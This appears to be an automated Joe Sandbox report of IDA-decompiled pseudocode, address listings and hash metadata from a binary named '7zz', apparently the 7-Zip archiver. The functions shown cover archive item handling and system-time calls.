										E0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t246,  *(_t319 - 0x14));
									}
									_t215 = 1;
									__eflags = _t314 - _t215;
									 *(_t319 - 0x1c) = _t215;
									if(_t314 > _t215) {
										do {
											E00415C6D(_t317 + 0x94,  *(_t319 - 0x1c) +  *(_t319 - 0x14));
											 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 1;
											__eflags =  *(_t319 - 0x1c) - _t314;
										} while ( *(_t319 - 0x1c) < _t314);
									}
								}
								 *(_t319 - 0x18) =  *(_t319 - 0x18) + _t246;
								 *(_t319 - 0x14) =  *(_t319 - 0x14) + _t314;
								E0042389F(_t317 + 0x58, _t246, _t314);
								_t250 =  *(_t317 + 0x24);
								 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
								__eflags =  *(_t319 - 0x10) - _t250;
							} while ( *(_t319 - 0x10) < _t250);
							_t305 = 0;
							__eflags = 0;
						}
						_t160 =  *(_t317 + 0x38);
						__eflags = _t160 - _t305;
						if(_t160 != _t305) {
							 *(_t319 - 0x10) =  *(_t319 - 0x10) & 0x00000000;
							__eflags = _t160;
							if(_t160 > 0) {
								_t65 = _t319 - 0x1c;
								 *_t65 =  *(_t319 - 0x1c) & 0x00000000;
								__eflags =  *_t65;
								do {
									_t278 = 0;
									_t205 =  *((intOrPtr*)(_t317 + 0x3c)) +  *(_t319 - 0x1c);
									_t244 =  *_t205;
									__eflags = _t244;
									if(_t244 > 0) {
										_t302 =  *((intOrPtr*)(_t317 + 0x64));
										do {
											_t278 = _t278 +  *_t302;
											_t302 = _t302 + 8;
											_t244 = _t244 - 1;
											__eflags = _t244;
										} while (_t244 != 0);
									}
									_t313 = _t205[2];
									_t301 = _t205[1] + _t278;
									_t245 = 0;
									__eflags = _t313;
									if(_t313 > 0) {
										_t281 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
										__eflags = _t281;
										do {
											_t245 = _t245 +  *_t281;
											_t281 = _t281 + 8;
											_t313 = _t313 - 1;
											__eflags = _t313;
										} while (_t313 != 0);
									}
									E0042389F(_t317 + 0x6c, _t301, _t205[3] + _t245);
									 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
									 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 0x10;
									__eflags =  *(_t319 - 0x10) -  *(_t317 + 0x38);
								} while ( *(_t319 - 0x10) <  *(_t317 + 0x38));
							}
							_t312 = 0;
							__eflags =  *(_t319 - 0x14);
							if( *(_t319 - 0x14) > 0) {
								do {
									_t276 =  *(_t317 + 0x74);
									_t299 = 0;
									__eflags = _t276;
									if(_t276 <= 0) {
										L31:
										_t299 = _t299 | 0xffffffff;
										__eflags = _t299;
									} else {
										_t202 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
										__eflags = _t202;
										while(1) {
											__eflags =  *_t202 - _t312;
											if( *_t202 == _t312) {
												goto L32;
											}
											_t299 = _t299 + 1;
											_t202 = _t202 + 8;
											__eflags = _t299 - _t276;
											if(_t299 < _t276) {
												continue;
											} else {
												goto L31;
											}
											goto L32;
										}
									}
									L32:
									__eflags = _t299 - 0xffffffff;
									if(_t299 == 0xffffffff) {
										E00415C6D(_t317 + 0x94, _t312);
									}
									_t312 = _t312 + 1;
									__eflags = _t312 -  *(_t319 - 0x14);
								} while (_t312 <  *(_t319 - 0x14));
							}
						}
						_t307 = 0;
						__eflags =  *(_t319 - 0x18);
						if( *(_t319 - 0x18) > 0) {
							do {
								_t274 =  *(_t317 + 0x74);
								_t298 = 0;
								__eflags = _t274;
								if(_t274 <= 0) {
									L40:
									_t298 = _t298 | 0xffffffff;
									__eflags = _t298;
								} else {
									_t199 =  *((intOrPtr*)(_t317 + 0x78));
									while(1) {
										__eflags =  *_t199 - _t307;
										if( *_t199 == _t307) {
											goto L41;
										}
										_t298 = _t298 + 1;
										_t199 = _t199 + 8;
										__eflags = _t298 - _t274;
										if(_t298 < _t274) {
											continue;
										} else {
											goto L40;
										}
										goto L41;
									}
								}
								L41:
								__eflags = _t298 - 0xffffffff;
								if(_t298 == 0xffffffff) {
									E00415C6D(_t317 + 0x80, _t307);
								}
								_t307 = _t307 + 1;
								__eflags = _t307 -  *(_t319 - 0x18);
							} while (_t307 <  *(_t319 - 0x18));
						}
						__eflags =  *(_t317 + 0x88);
						if( *(_t317 + 0x88) == 0) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x8c))));
						while(1) {
							_t163 = E00424159(_t317 + 0x58, _t162, _t319 - 0x1c, _t319 - 0x10);
							_t254 =  *(_t319 - 0x1c);
							_t308 = 0;
							__eflags = _t254;
							if(_t254 <= 0) {
								goto L50;
							}
							_t196 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
							__eflags = _t196;
							do {
								_t308 = _t308 +  *_t196;
								_t196 = _t196 + 8;
								_t254 = _t254 - 1;
								__eflags = _t254;
							} while (_t254 != 0);
							L50:
							_t255 =  *(_t317 + 0x74);
							_t296 = 0;
							__eflags = _t255;
							if(_t255 <= 0) {
								L54:
								_t164 = _t163 | 0xffffffff;
								__eflags = _t164;
							} else {
								_t194 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
								__eflags = _t194;
								while(1) {
									__eflags =  *_t194 - _t308;
									if( *_t194 == _t308) {
										break;
									}
									_t296 = _t296 + 1;
									_t194 = _t194 + 8;
									__eflags = _t296 - _t255;
									if(_t296 < _t255) {
										continue;
									} else {
										goto L54;
									}
									goto L55;
								}
								_t164 = _t296;
							}
							L55:
							__eflags = _t164;
							if(_t164 >= 0) {
								_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x78)) + _t164 * 8));
								continue;
							}
							_t256 =  *(_t317 + 0x9c);
							_t297 = 0;
							__eflags = _t256;
							if(_t256 > 0) {
								_t188 =  *((intOrPtr*)(_t317 + 0xa0));
								while(1) {
									__eflags =  *_t188 - _t308;
									if(__eflags == 0) {
										break;
									}
									_t297 = _t297 + 1;
									_t188 = _t188 + 4;
									__eflags = _t297 - _t256;
									if(_t297 < _t256) {
										continue;
									} else {
									}
									goto L64;
								}
								_t243 = _t317 + 0x94;
								 *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x94)) + 4))(_t297, 1);
								E00408767(_t243, __eflags, 0);
								 *((intOrPtr*)( *((intOrPtr*)(_t243 + 0xc)))) = _t308;
							}
							L64:
							__eflags =  *((char*)(_t317 + 0x48));
							if( *((char*)(_t317 + 0x48)) != 0) {
								_t310 =  *(_t317 + 0x9c);
								_t241 = 0;
								__eflags = _t310;
								 *(_t319 - 0x1c) = _t310;
								if(_t310 > 0) {
									do {
										E0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t241,  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0xa0)) + _t241 * 4)));
										_t241 = _t241 + 1;
										__eflags = _t241 - _t310;
									} while (_t241 < _t310);
								}
								E0040862D();
								_t242 = 0;
								__eflags = _t310;
								if(_t310 > 0) {
									 *(_t319 - 0x18) = _t319 - 0x44;
									do {
										E00404AD0(_t319 - 0x44, 4);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 0x48) =  *(_t319 - 0x48) & 0x00000000;
										_t175 = 1;
										 *((intOrPtr*)(_t319 - 0x2c)) = _t175;
										 *((intOrPtr*)(_t319 - 0x28)) = _t175;
										 *(_t319 - 4) = 2;
										_push(_t319 - 0x4c);
										 *((intOrPtr*)(_t319 - 0x4c)) = 0x6f10701;
										E00428BB4(_t317 + 0x1c);
										_t178 = 1;
										E0042389F(_t317 + 0x58, _t178, _t178);
										E00415C6D(_t317 + 0x94,  *(_t319 - 0x14) + _t242);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 4) = 3;
										E0040862D();
										 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
										E00408604(_t319 - 0x44);
										_t242 = _t242 + 1;
										__eflags = _t242 -  *(_t319 - 0x1c);
									} while (_t242 <  *(_t319 - 0x1c));
								}
							}
							goto L70;
						}
					} else {
						if( *((char*)(__ecx + 0x48)) == 0) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						if( *(_t317 + 0x38) != _t305) {
							 *(_t319 - 0x1c) = 1;
							E0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						E00428B61(_t319 - 0x6c);
						_t247 = 1;
						_push(_t319 - 0x74);
						 *(_t319 - 4) = _t305;
						 *(_t319 - 0x54) = _t247;
						 *(_t319 - 0x50) = _t247;
						 *((intOrPtr*)(_t319 - 0x74)) = 0x6f10701;
						 *(_t319 - 0x70) = _t305;
						E00428BB4(_t317 + 0x1c);
						_t225 = _t247;
						_push(_t225);
						_t226 = _t247;
						_push(_t226);
						E0042389F(_t317 + 0x58);
						E00415C6D(_t317 + 0x80, _t305);
						E00415C6D(_t317 + 0x94, _t305);
						 *(_t319 - 0x6c) = 0x47b178;
						 *(_t319 - 0x1c) = _t319 - 0x6c;
						 *(_t319 - 4) = _t247;
						E0040862D();
						 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
						E00408604(_t319 - 0x6c);
					}
					L70:
					_t240 =  *(_t317 + 0x24) - 1;
					if(_t240 >= 0) {
						_t309 = _t317 + 0xfc;
						do {
							E0042389F(_t309,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)) + 4)));
							_t240 = _t240 - 1;
						} while (_t240 >= 0);
					}
					_push(0xa8);
					_t258 = E004079F2();
					 *(_t319 - 0x1c) = _t258;
					_t330 = _t258;
					 *(_t319 - 4) = 4;
					if(_t258 == 0) {
						_t166 = 0;
						__eflags = 0;
					} else {
						_push(_t317 + 0x58);
						_t166 = E004233F8(_t258, _t330);
					}
					 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t317 + 0xf8)) = _t166;
					E00423685(_t166, _t317 + 0xa8);
					 *((char*)(_t317 + 0x110)) = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t319 - 0xc));
				return 0;
			}























































                                                                      0x004285b2
                                                                      0x004285bc
                                                                      0x004285bf
                                                                      0x004285c8
                                                                      0x004285ce
                                                                      0x004285d3
                                                                      0x00428687
                                                                      0x00428689
                                                                      0x0042868c
                                                                      0x0042868f
                                                                      0x00428692
                                                                      0x00428698
                                                                      0x0042869b
                                                                      0x0042869e
                                                                      0x004286a2
                                                                      0x004286a5
                                                                      0x004286a8
                                                                      0x004286ab
                                                                      0x004286ae
                                                                      0x004286b1
                                                                      0x004286b3
                                                                      0x004286c8
                                                                      0x004286d2
                                                                      0x004286dd
                                                                      0x004286e0
                                                                      0x004286b5
                                                                      0x004286c1
                                                                      0x004286c1
                                                                      0x004286e4
                                                                      0x004286e5
                                                                      0x004286e7
                                                                      0x004286ea
                                                                      0x004286ec
                                                                      0x004286fb
                                                                      0x00428700
                                                                      0x00428703
                                                                      0x00428703
                                                                      0x004286ec
                                                                      0x004286ea
                                                                      0x00428708
                                                                      0x0042870b
                                                                      0x00428713
                                                                      0x00428718
                                                                      0x0042871b
                                                                      0x0042871e
                                                                      0x0042871e
                                                                      0x00428727
                                                                      0x00428727
                                                                      0x00428727
                                                                      0x00428729
                                                                      0x0042872c
                                                                      0x0042872e
                                                                      0x00428734
                                                                      0x00428738
                                                                      0x0042873a
                                                                      0x0042873c
                                                                      0x0042873c
                                                                      0x0042873c
                                                                      0x00428740
                                                                      0x00428743
                                                                      0x00428745
                                                                      0x00428748
                                                                      0x0042874a
                                                                      0x0042874c
                                                                      0x0042874e
                                                                      0x00428751
                                                                      0x00428751
                                                                      0x00428753
                                                                      0x00428756
                                                                      0x00428756
                                                                      0x00428756
                                                                      0x00428751
                                                                      0x0042875c
                                                                      0x0042875f
                                                                      0x00428761
                                                                      0x00428763
                                                                      0x00428765
                                                                      0x0042876a
                                                                      0x0042876a
                                                                      0x0042876d
                                                                      0x0042876d
                                                                      0x0042876f
                                                                      0x00428772
                                                                      0x00428772
                                                                      0x00428772
                                                                      0x0042876d
                                                                      0x0042877f
                                                                      0x00428784
                                                                      0x0042878a
                                                                      0x0042878e
                                                                      0x0042878e
                                                                      0x00428740
                                                                      0x00428793
                                                                      0x00428795
                                                                      0x00428798
                                                                      0x0042879a
                                                                      0x0042879a
                                                                      0x0042879d
                                                                      0x0042879f
                                                                      0x004287a1
                                                                      0x004287b5
                                                                      0x004287b5
                                                                      0x004287b5
                                                                      0x004287a3
                                                                      0x004287a6
                                                                      0x004287a6
                                                                      0x004287a9
                                                                      0x004287a9
                                                                      0x004287ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004287ad
                                                                      0x004287ae
                                                                      0x004287b1
                                                                      0x004287b3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004287b3
                                                                      0x004287a9
                                                                      0x004287b8
                                                                      0x004287b8
                                                                      0x004287bb
                                                                      0x004287c4
                                                                      0x004287c4
                                                                      0x004287c9
                                                                      0x004287ca
                                                                      0x004287ca
                                                                      0x0042879a
                                                                      0x00428798
                                                                      0x004287cf
                                                                      0x004287d1
                                                                      0x004287d4
                                                                      0x004287d6
                                                                      0x004287d6
                                                                      0x004287d9
                                                                      0x004287db
                                                                      0x004287dd
                                                                      0x004287ee
                                                                      0x004287ee
                                                                      0x004287ee
                                                                      0x004287df
                                                                      0x004287df
                                                                      0x004287e2
                                                                      0x004287e2
                                                                      0x004287e4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004287e6
                                                                      0x004287e7
                                                                      0x004287ea
                                                                      0x004287ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004287ec
                                                                      0x004287e2
                                                                      0x004287f1
                                                                      0x004287f1
                                                                      0x004287f4
                                                                      0x004287fd
                                                                      0x004287fd
                                                                      0x00428802
                                                                      0x00428803
                                                                      0x00428803
                                                                      0x004287d6
                                                                      0x00428808
                                                                      0x0042880f
                                                                      0x0042881a
                                                                      0x00428821
                                                                      0x00428821
                                                                      0x0042882c
                                                                      0x0042882e
                                                                      0x0042883a
                                                                      0x0042883f
                                                                      0x00428842
                                                                      0x00428844
                                                                      0x00428846
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042884b
                                                                      0x0042884b
                                                                      0x0042884e
                                                                      0x0042884e
                                                                      0x00428850
                                                                      0x00428853
                                                                      0x00428853
                                                                      0x00428853
                                                                      0x00428856
                                                                      0x00428856
                                                                      0x00428859
                                                                      0x0042885b
                                                                      0x0042885d
                                                                      0x00428871
                                                                      0x00428871
                                                                      0x00428871
                                                                      0x0042885f
                                                                      0x00428862
                                                                      0x00428862
                                                                      0x00428865
                                                                      0x00428865
                                                                      0x00428867
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00428869
                                                                      0x0042886a
                                                                      0x0042886d
                                                                      0x0042886f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042886f
                                                                      0x00428880
                                                                      0x00428880
                                                                      0x00428874
                                                                      0x00428874
                                                                      0x00428876
                                                                      0x0042887b
                                                                      0x00000000
                                                                      0x0042887b
                                                                      0x00428884
                                                                      0x0042888a
                                                                      0x0042888c
                                                                      0x0042888e
                                                                      0x00428890
                                                                      0x00428896
                                                                      0x00428896
                                                                      0x00428898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042889a
                                                                      0x0042889b
                                                                      0x0042889e
                                                                      0x004288a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004288a2
                                                                      0x00000000
                                                                      0x004288a0
                                                                      0x004288aa
                                                                      0x004288b5
                                                                      0x004288bc
                                                                      0x004288c4
                                                                      0x004288c4
                                                                      0x004288c6
                                                                      0x004288c6
                                                                      0x004288ca
                                                                      0x004288d0
                                                                      0x004288d6
                                                                      0x004288d8
                                                                      0x004288da
                                                                      0x004288dd
                                                                      0x004288df
                                                                      0x004288f1
                                                                      0x004288f6
                                                                      0x004288f7
                                                                      0x004288f7
                                                                      0x004288df
                                                                      0x00428901
                                                                      0x00428906
                                                                      0x00428908
                                                                      0x0042890a
                                                                      0x00428918
                                                                      0x0042891b
                                                                      0x00428920
                                                                      0x00428925
                                                                      0x0042892a
                                                                      0x0042892e
                                                                      0x00428932
                                                                      0x00428935
                                                                      0x0042893b
                                                                      0x00428942
                                                                      0x00428943
                                                                      0x0042894a
                                                                      0x00428954
                                                                      0x00428957
                                                                      0x00428968
                                                                      0x0042896d
                                                                      0x00428973
                                                                      0x0042897a
                                                                      0x0042897f
                                                                      0x00428986
                                                                      0x0042898b
                                                                      0x0042898c
                                                                      0x0042898c
                                                                      0x0042891b
                                                                      0x0042890a
                                                                      0x00000000
                                                                      0x004288ca
                                                                      0x004285d9
                                                                      0x004285dd
                                                                      0x004285e8
                                                                      0x004285ef
                                                                      0x004285ef
                                                                      0x004285f7
                                                                      0x00428602
                                                                      0x00428609
                                                                      0x00428609
                                                                      0x00428611
                                                                      0x0042861b
                                                                      0x0042861f
                                                                      0x00428620
                                                                      0x00428623
                                                                      0x00428626
                                                                      0x00428629
                                                                      0x00428630
                                                                      0x00428633
                                                                      0x0042863c
                                                                      0x0042863d
                                                                      0x0042863f
                                                                      0x00428640
                                                                      0x00428641
                                                                      0x0042864d
                                                                      0x00428659
                                                                      0x00428661
                                                                      0x00428668
                                                                      0x0042866e
                                                                      0x00428671
                                                                      0x00428676
                                                                      0x0042867d
                                                                      0x0042867d
                                                                      0x00428991
                                                                      0x00428994
                                                                      0x00428997
                                                                      0x00428999
                                                                      0x0042899f
                                                                      0x004289ac
                                                                      0x004289b1
                                                                      0x004289b1
                                                                      0x0042899f
                                                                      0x004289b4
                                                                      0x004289bf
                                                                      0x004289c1
                                                                      0x004289c4
                                                                      0x004289c6
                                                                      0x004289cd
                                                                      0x004289da
                                                                      0x004289da
                                                                      0x004289cf
                                                                      0x004289d2
                                                                      0x004289d3
                                                                      0x004289d3
                                                                      0x004289dc
                                                                      0x004289e9
                                                                      0x004289ef
                                                                      0x004289f4
                                                                      0x004289f4
                                                                      0x00428a03
                                                                      0x00428a0b

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004285B2
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionH_prologRaise
                                                                      • String ID: -B
                                                                      • API String ID: 3968804221-1556737743
                                                                      • Opcode ID: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
                                                                      • Instruction ID: 497342fa4ed3f4b9ebe93b95b60b4c65b54af6a842b733f80198680210375e09
                                                                      • Opcode Fuzzy Hash: 8b6edb9bbaf86e6928269366864835dc3159b99dbc82969dba9d0f39c986a797
                                                                      • Instruction Fuzzy Hash: FCE1F271A007158FDB24DFAAD981BAFB3F5FF84304FA0451EE056A7281DB38A941CB18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040C756 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040C756(struct _FILETIME* __ecx) {
				struct _SYSTEMTIME _v20;
				struct _FILETIME* _t7;

				_t7 = __ecx;
				GetSystemTime( &_v20);
				return SystemTimeToFileTime( &_v20, _t7);
			}





                                                                      0x0040c760
                                                                      0x0040c763
                                                                      0x0040c776

                                                                      APIs
                                                                      • GetSystemTime.KERNEL32(?,?,?,00000000,00000000,00490AB0), ref: 0040C763
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040C76E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$File
                                                                      • String ID:
                                                                      • API String ID: 2838179519-0
                                                                      • Opcode ID: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                      • Instruction ID: 3ee87ebca316f74d42706c1ab11f39572f018b02ddf3dd2ab21967cb3d1fbd11
                                                                      • Opcode Fuzzy Hash: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                      • Instruction Fuzzy Hash: 95D0C972810129AB9B00ABA89C0D8EF7BACEA49114B840866A555D3041E6B0E51487E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00434D28 Relevance: 2.5, APIs: 1, Instructions: 999COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 76%
                                                                      			E00434D28() {
				signed int _t538;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t548;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				signed int _t565;
				signed int _t569;
				signed int _t570;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t589;
				signed int _t598;
				signed int _t602;
				signed int _t627;
				signed int _t631;
				signed int _t636;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t655;
				signed int _t657;
				signed int _t661;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				signed int _t674;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed char _t691;
				signed char _t692;
				intOrPtr* _t694;
				signed int _t696;
				signed int _t698;
				signed int _t701;
				signed int _t703;
				signed int _t706;
				signed int _t712;
				signed int _t717;
				void* _t723;
				signed int _t727;
				signed int _t734;
				signed int _t742;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t768;
				intOrPtr* _t775;
				intOrPtr _t776;
				signed int _t777;
				void* _t779;
				signed int _t781;
				signed int _t783;
				signed int _t787;
				signed int* _t801;
				signed int _t807;
				intOrPtr _t833;
				signed int _t836;
				signed int _t840;
				signed int _t872;
				signed int _t876;
				signed int _t880;
				signed char _t890;
				intOrPtr _t909;
				signed int _t925;
				signed int _t926;
				signed int _t935;
				intOrPtr _t938;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t941;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t949;
				intOrPtr _t950;
				intOrPtr* _t952;
				intOrPtr _t954;
				intOrPtr _t956;
				intOrPtr _t958;
				void* _t959;
				void* _t961;

				E0046B890(0x477da9, _t959);
				_t935 = 0;
				 *((intOrPtr*)(_t959 - 0x10)) = _t961 - 0x98;
				 *(_t959 - 4) = 0;
				 *((char*)(_t959 - 0x21)) =  *((intOrPtr*)(_t959 + 0x10)) == 0xffffffff;
				if( *((char*)(_t959 - 0x21)) != 0) {
					 *((intOrPtr*)(_t959 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t959 + 8)) + 0x24));
				}
				if( *((intOrPtr*)(_t959 + 0x10)) == _t935) {
					L205:
					_t538 = 0;
					goto L41;
				} else {
					 *(_t959 - 0x3c) = _t935;
					 *(_t959 - 0x38) = _t935;
					 *(_t959 + 0x14) = 0xfffffffe;
					 *(_t959 - 0x90) =  *(_t959 + 0x14) != _t935;
					_t539 = 0;
					while(1) {
						 *(_t959 - 0x44) = _t539;
						if(_t539 >=  *((intOrPtr*)(_t959 + 0x10))) {
							break;
						}
						if( *((char*)(_t959 - 0x21)) == 0) {
							_t539 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t539 * 4);
						}
						_t909 =  *((intOrPtr*)(_t959 + 8));
						_t765 =  *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8;
						_t958 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x14)) +  *( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8)[1] * 4));
						if(( *(_t958 + 0x1c) >> 0x00000004 & 0x00000001) == 0) {
							_t768 = E00434147( *((intOrPtr*)(_t959 + 8)) + 8, _t765);
							if(_t768 !=  *(_t959 + 0x14)) {
								 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
								asm("adc [ebp-0x38], ebx");
							}
							 *(_t959 + 0x14) = _t768;
							_t935 =  *((intOrPtr*)(_t958 + 0x10)) +  *((intOrPtr*)(_t958 + 0xc));
							asm("adc ebx, ecx");
						}
						_t539 =  *(_t959 - 0x44) + 1;
					}
					 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
					asm("adc [ebp-0x38], ebx");
					_t775 =  *((intOrPtr*)(_t959 + 0x18));
					 *((intOrPtr*)( *_t775 + 0xc))(_t775,  *(_t959 - 0x3c),  *(_t959 - 0x38));
					_push(0x38);
					 *(_t959 - 0x3c) = 0;
					 *(_t959 - 0x38) = 0;
					 *((intOrPtr*)(_t959 - 0x8c)) = 0;
					 *((intOrPtr*)(_t959 - 0x88)) = 0;
					_t787 = E004079F2();
					 *(_t959 + 0x14) = _t787;
					__eflags = _t787;
					 *(_t959 - 4) = 1;
					if(_t787 == 0) {
						_t945 = 0;
						__eflags = 0;
					} else {
						_t945 = E0040F3E5(_t787);
					}
					 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
					__eflags = _t945;
					 *(_t959 - 0x98) = _t945;
					 *(_t959 - 0x2c) = _t945;
					if(_t945 != 0) {
						 *((intOrPtr*)( *_t945 + 4))(_t945);
					}
					_push(0);
					 *(_t959 - 4) = 2;
					E0040F478(_t945, _t775);
					_push(0x18);
					_t544 = E004079F2();
					__eflags = _t544;
					if(_t544 == 0) {
						_t544 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t544 + 4)) = 0x47b080;
						 *((intOrPtr*)(_t544 + 8)) = 0;
						 *((intOrPtr*)(_t544 + 0x10)) = 0;
						 *((intOrPtr*)(_t544 + 0xc)) = 0;
						 *((intOrPtr*)(_t544 + 0x14)) = 0;
						 *_t544 = 0x47b070;
						 *((intOrPtr*)(_t544 + 4)) = 0x47b060;
					}
					__eflags = _t544;
					 *(_t959 - 0x28) = _t544;
					if(_t544 != 0) {
						 *((intOrPtr*)( *_t544 + 4))(_t544);
					}
					 *(_t959 - 0x94) = 0;
					 *(_t959 - 0x20) = 0;
					 *(_t959 - 0x58) = 0;
					 *(_t959 - 0x1c) = 0;
					 *(_t959 - 0x5c) = 0;
					 *(_t959 - 0x18) = 0;
					_push(0x24);
					 *(_t959 - 4) = 6;
					_t545 = E004079F2();
					 *(_t959 + 0x14) = _t545;
					__eflags = _t545;
					 *(_t959 - 4) = 7;
					if(_t545 == 0) {
						_t946 = 0;
						__eflags = 0;
					} else {
						_t946 = E00435A6A(_t545);
					}
					__eflags = _t946;
					 *(_t959 - 0x50) = _t946;
					 *(_t959 - 4) = 6;
					 *(_t959 - 0x14) = _t946;
					if(_t946 != 0) {
						 *((intOrPtr*)( *_t946 + 4))(_t946);
					}
					 *(_t959 - 4) = 8;
					_t546 = E004339CC(_t946);
					__eflags = _t546;
					if(_t546 != 0) {
						E00404AD0(_t959 - 0x84, 1);
